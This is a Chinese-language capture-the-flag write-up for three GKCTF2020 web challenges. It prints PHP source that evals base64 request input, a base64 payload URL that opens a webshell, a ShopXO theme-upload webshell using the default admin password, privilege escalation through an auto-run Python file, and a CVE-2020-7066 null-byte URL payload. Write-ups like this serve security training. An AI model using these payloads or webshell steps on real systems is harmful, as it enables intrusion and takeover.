GKCTF2020-前三道web-wp

GKCTF2020-web

上个网课，作业多的一批，周末都还有课，真的服！！！
后面四道题目wp：GKCTF2020-后四道WEB复现-wp

[GKCTF2020]CheckIN

打开题目得到源码：

<title>Check_In</title> 
  
highlight_file(__FILE__); 
class ClassName 
{ 
        public $code = null; 
        public $decode = null; 
        function __construct() 
        { 
                $this->code = @$this->x()['Ginkgo']; 
                $this->decode = @base64_decode( $this->code ); 
                @Eval($this->decode); 
        } 

        public function x() 
        { 
                return $_REQUEST; 
        } 
} 
new ClassName();

一个简单的命令执行，直接执行phpinfo();：

禁用了很多函数，估计又是bypass的题目，事后证明确实，因为又是需要执行readflag
执行url如下：

http://d81739ba-e081-483b-97ba-e30312f3a239.node3.buuoj.cn/?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==

然后蚁剑链接，选base64：

成功的到shell:

直接上传bypass脚本，然后包含即可：

得到flag:

[GKCTF2020]老八小超市儿

shopxo的漏洞，直接百度一手，找到后台getshell的方法，照着操作就能得到shell
先进入后台，admin默认密码shopxo直接登录，之后找到主题下载：

然后在下载的主题的\default\_static_插入自己的shell，然后去安装主题：

然后蚁剑链接：/public/static/index/default/shell.php

之后发现flag是假的，而且提示真的在root下，之后发现有个auto.sh，自动执行py文件：

找到py文件，对其进行修改即可：

等上一分钟，访问1.txt：

[GKCTF2020]cve版签到

题目有提示了：cve2020-7066

貌似是get_headers()函数中的内容可以被%00截断，返回到题目说是：

直接传入：?url=http://127.0.0.1%00.ctfhub.com:

按照提示传入：?url=http://127.0.0.123%00.ctfhub.com，直接出flag：